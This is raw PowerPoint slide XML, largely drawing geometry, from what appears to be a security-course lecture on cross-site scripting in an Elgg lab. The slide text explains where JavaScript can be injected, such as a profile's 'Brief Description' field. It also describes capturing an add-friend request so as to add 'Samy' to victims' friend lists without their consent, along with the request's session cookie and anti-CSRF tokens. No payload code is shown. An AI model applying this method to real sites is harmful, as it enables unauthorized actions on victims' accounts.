                  <a:cubicBezTo>
                    <a:pt x="0" y="105"/>
                    <a:pt x="52" y="113"/>
                    <a:pt x="98" y="120"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="123" y="124"/>
                    <a:pt x="163" y="131"/>
                    <a:pt x="163" y="157"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="163" y="176"/>
                    <a:pt x="144" y="192"/>
                    <a:pt x="99" y="192"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="75" y="192"/>
                    <a:pt x="48" y="187"/>
                    <a:pt x="35" y="148"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="33" y="139"/>
                    <a:pt x="31" y="133"/>
                    <a:pt x="18" y="133"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="133"/>
                    <a:pt x="0" y="144"/>
                    <a:pt x="0" y="154"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="0" y="202"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="210"/>
                    <a:pt x="0" y="222"/>
                    <a:pt x="15" y="222"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="20" y="222"/>
                    <a:pt x="28" y="222"/>
                    <a:pt x="34" y="203"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="58" y="221"/>
                    <a:pt x="84" y="222"/>
                    <a:pt x="98" y="222"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="177" y="222"/>
                    <a:pt x="193" y="181"/>
                    <a:pt x="193" y="157"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="193" y="105"/>
                    <a:pt x="129" y="95"/>
                    <a:pt x="113" y="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6" name="Freeform 187">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F1E26D7C-B768-410C-A8F6-A6D9416CB8D8}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId88"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3865564" y="3338513"/>
              <a:ext cx="88900" cy="122238"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 98 w 212"/>
                <a:gd name="T1" fmla="*/ 92 h 279"/>
                <a:gd name="T2" fmla="*/ 180 w 212"/>
                <a:gd name="T3" fmla="*/ 92 h 279"/>
                <a:gd name="T4" fmla="*/ 200 w 212"/>
                <a:gd name="T5" fmla="*/ 77 h 279"/>
                <a:gd name="T6" fmla="*/ 180 w 212"/>
                <a:gd name="T7" fmla="*/ 61 h 279"/>
                <a:gd name="T8" fmla="*/ 98 w 212"/>
                <a:gd name="T9" fmla="*/ 61 h 279"/>
                <a:gd name="T10" fmla="*/ 98 w 212"/>
                <a:gd name="T11" fmla="*/ 21 h 279"/>
                <a:gd name="T12" fmla="*/ 81 w 212"/>
                <a:gd name="T13" fmla="*/ 0 h 279"/>
                <a:gd name="T14" fmla="*/ 64 w 212"/>
                <a:gd name="T15" fmla="*/ 21 h 279"/>
                <a:gd name="T16" fmla="*/ 64 w 212"/>
                <a:gd name="T17" fmla="*/ 61 h 279"/>
                <a:gd name="T18" fmla="*/ 21 w 212"/>
                <a:gd name="T19" fmla="*/ 61 h 279"/>
                <a:gd name="T20" fmla="*/ 0 w 212"/>
                <a:gd name="T21" fmla="*/ 77 h 279"/>
                <a:gd name="T22" fmla="*/ 20 w 212"/>
                <a:gd name="T23" fmla="*/ 92 h 279"/>
                <a:gd name="T24" fmla="*/ 64 w 212"/>
                <a:gd name="T25" fmla="*/ 92 h 279"/>
                <a:gd name="T26" fmla="*/ 64 w 212"/>
                <a:gd name="T27" fmla="*/ 214 h 279"/>
                <a:gd name="T28" fmla="*/ 134 w 212"/>
                <a:gd name="T29" fmla="*/ 279 h 279"/>
                <a:gd name="T30" fmla="*/ 212 w 212"/>
                <a:gd name="T31" fmla="*/ 214 h 279"/>
                <a:gd name="T32" fmla="*/ 194 w 212"/>
                <a:gd name="T33" fmla="*/ 194 h 279"/>
                <a:gd name="T34" fmla="*/ 177 w 212"/>
                <a:gd name="T35" fmla="*/ 213 h 279"/>
                <a:gd name="T36" fmla="*/ 137 w 212"/>
                <a:gd name="T37" fmla="*/ 249 h 279"/>
                <a:gd name="T38" fmla="*/ 98 w 212"/>
                <a:gd name="T39" fmla="*/ 211 h 279"/>
                <a:gd name="T40" fmla="*/ 98 w 212"/>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79">
                  <a:moveTo>
                    <a:pt x="98" y="92"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="180" y="92"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="188" y="92"/>
                    <a:pt x="200" y="92"/>
                    <a:pt x="200" y="77"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="200" y="61"/>
                    <a:pt x="188" y="61"/>
                    <a:pt x="180" y="61"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="98" y="61"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="98" y="21"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="98" y="11"/>
                    <a:pt x="98" y="0"/>
                    <a:pt x="81" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="64" y="0"/>
                    <a:pt x="64" y="11"/>
                    <a:pt x="64" y="21"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="64" y="61"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="21" y="61"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="13" y="61"/>
                    <a:pt x="0" y="61"/>
                    <a:pt x="0" y="77"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="92"/>
                    <a:pt x="13" y="92"/>
                    <a:pt x="20" y="92"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="64" y="92"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="64" y="214"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="64" y="261"/>
                    <a:pt x="98" y="279"/>
                    <a:pt x="134" y="279"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="171" y="279"/>
                    <a:pt x="212" y="258"/>
                    <a:pt x="212" y="214"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="212" y="205"/>
                    <a:pt x="212" y="194"/>
                    <a:pt x="194" y="194"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="178" y="194"/>
                    <a:pt x="177" y="205"/>
                    <a:pt x="177" y="213"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="177" y="244"/>
                    <a:pt x="148" y="249"/>
                    <a:pt x="137" y="249"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="98" y="249"/>
                    <a:pt x="98" y="223"/>
                    <a:pt x="98" y="211"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="98"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7" name="Freeform 188">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AC31DDD3-E156-4BF9-BD72-D9F8E139AC5C}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId89"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3983039" y="3338513"/>
              <a:ext cx="85725" cy="109538"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 195 w 206"/>
                <a:gd name="T1" fmla="*/ 141 h 249"/>
                <a:gd name="T2" fmla="*/ 206 w 206"/>
                <a:gd name="T3" fmla="*/ 125 h 249"/>
                <a:gd name="T4" fmla="*/ 197 w 206"/>
                <a:gd name="T5" fmla="*/ 109 h 249"/>
                <a:gd name="T6" fmla="*/ 31 w 206"/>
                <a:gd name="T7" fmla="*/ 5 h 249"/>
                <a:gd name="T8" fmla="*/ 18 w 206"/>
                <a:gd name="T9" fmla="*/ 0 h 249"/>
                <a:gd name="T10" fmla="*/ 0 w 206"/>
                <a:gd name="T11" fmla="*/ 18 h 249"/>
                <a:gd name="T12" fmla="*/ 12 w 206"/>
                <a:gd name="T13" fmla="*/ 34 h 249"/>
                <a:gd name="T14" fmla="*/ 155 w 206"/>
                <a:gd name="T15" fmla="*/ 125 h 249"/>
                <a:gd name="T16" fmla="*/ 12 w 206"/>
                <a:gd name="T17" fmla="*/ 215 h 249"/>
                <a:gd name="T18" fmla="*/ 0 w 206"/>
                <a:gd name="T19" fmla="*/ 232 h 249"/>
                <a:gd name="T20" fmla="*/ 18 w 206"/>
                <a:gd name="T21" fmla="*/ 249 h 249"/>
                <a:gd name="T22" fmla="*/ 31 w 206"/>
                <a:gd name="T23" fmla="*/ 245 h 249"/>
                <a:gd name="T24" fmla="*/ 195 w 206"/>
                <a:gd name="T25" fmla="*/ 141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49">
                  <a:moveTo>
                    <a:pt x="195" y="141"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="199" y="138"/>
                    <a:pt x="206" y="134"/>
                    <a:pt x="206" y="125"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="206" y="118"/>
                    <a:pt x="202" y="113"/>
                    <a:pt x="197" y="109"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="31" y="5"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="24" y="1"/>
                    <a:pt x="22" y="0"/>
                    <a:pt x="18" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="10" y="0"/>
                    <a:pt x="0" y="6"/>
                    <a:pt x="0" y="18"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="27"/>
                    <a:pt x="7" y="31"/>
                    <a:pt x="12" y="34"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="155" y="125"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12" y="215"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="7" y="219"/>
                    <a:pt x="0" y="223"/>
                    <a:pt x="0" y="232"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="244"/>
                    <a:pt x="10" y="249"/>
                    <a:pt x="18" y="249"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="22" y="249"/>
                    <a:pt x="24" y="249"/>
                    <a:pt x="31" y="245"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="195" y="14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grpSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1279314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DA65-FC9F-4689-9414-D6F16C3CCED8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Attack surfaces for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> attack</a:t>
            </a:r>
            <a:endParaRPr lang="en-NZ" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D8359DDF-74F4-4B1E-93A7-D7683030537C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="77500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>To launch an attack, we need to find places where we can </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" u="sng" dirty="0"/>
              <a:t>inject JavaScript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> code.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1700" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>These input fields are potential attack surfaces wherein attackers can put JavaScript code.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1700" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>If the web application doesn’t remove the code, the code can be triggered on the browser and cause damage.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1700" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>In our task, we will insert our code in the “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" u="sng" dirty="0"/>
              <a:t>Brief Description</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>” field, so that when Alice </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" u="sng" dirty="0"/>
              <a:t>views</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Samy’s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> profile, the code gets executed with a simple message.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-NZ" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{54746CD5-5DED-429A-806E-35D757010992}"/>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13</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3944299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B7B1-92EB-4913-875C-2210516D8C26}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>XSS Attack to befriend with others</a:t>
            </a:r>
            <a:endParaRPr lang="en-NZ" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B7F2ECDF-FE1E-40B4-8DB0-C7C0A82191E3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Goal:  Add Samy to other people’s friend list without their consent.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Investigation taken by attacker Samy:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Samy clicks “add-friend” button </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" u="sng" dirty="0"/>
              <a:t>from Charlie’s account</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> to add himself </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" u="sng" dirty="0"/>
              <a:t>to Charlie’s friend</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> list.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Using Firefox’s </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>HTTP Header Live</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> extension, he captures the add-friend request.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-NZ" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A88A71C8-ECAB-4E61-A8A6-5FD32E1DE103}"/>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14</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905855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C2B85-8771-4A32-907D-66A2EFBFB56D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>XSS Attack to befriend with others (cont.)</a:t>
            </a:r>
            <a:endParaRPr lang="en-NZ" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{917CF56B-C080-485A-87D5-2E8289D4C276}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="192024" y="867512"/>
            <a:ext cx="4045895" cy="2356951"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="70000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" u="sng" dirty="0"/>
              <a:t>Line ①</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: URL of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Elgg’s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> add-friend request. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>UserID</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> of the user to be added to the friend list is used. Here, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Samy’s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>UserID</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> (GUID) is 47.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" u="sng" dirty="0"/>
              <a:t>Line ②</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Elgg’s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> countermeasure against </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>CSRF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> attacks (this is now enabled).</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D9CC7999-500E-4925-A8A1-59D23BA1F2AF}"/>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15</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="888888"/>
              </a:solidFill>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A3BF7BAC-3673-4E40-8297-27C3401BC720}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4237919" y="867512"/>
            <a:ext cx="4732345" cy="2147675"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E4A45FF9-5920-4779-9D1C-5A0E06B41024}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="192024" y="3152274"/>
            <a:ext cx="8759952" cy="1478341"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="342900" indent="-342900" algn="l" defTabSz="457200" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2800" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="742950" indent="-285750" algn="l" defTabSz="457200" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="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457200" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="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457200" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="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b="1" u="sng" dirty="0"/>
              <a:t>Line ③</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>: Session cookie which is unique for each user. It is automatically sent by browsers. Here, if the attacker wants to access the cookies, it will be allowed as the JavaScript code is from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>Elgg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> website and not a third-party page like in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>CSRF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> (Cross-Site Request Forgery).</a:t>
            </a:r>
            <a:endParaRPr lang="en-NZ" sz="2000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="41937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4E6D-DE2B-4DE0-BD87-D915623FE938}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> attack to befriend with others (cont.)</a:t>
            </a:r>
            <a:endParaRPr lang="en-NZ" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{44D337F4-0E49-4F94-AC4A-D606FC0A42EA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
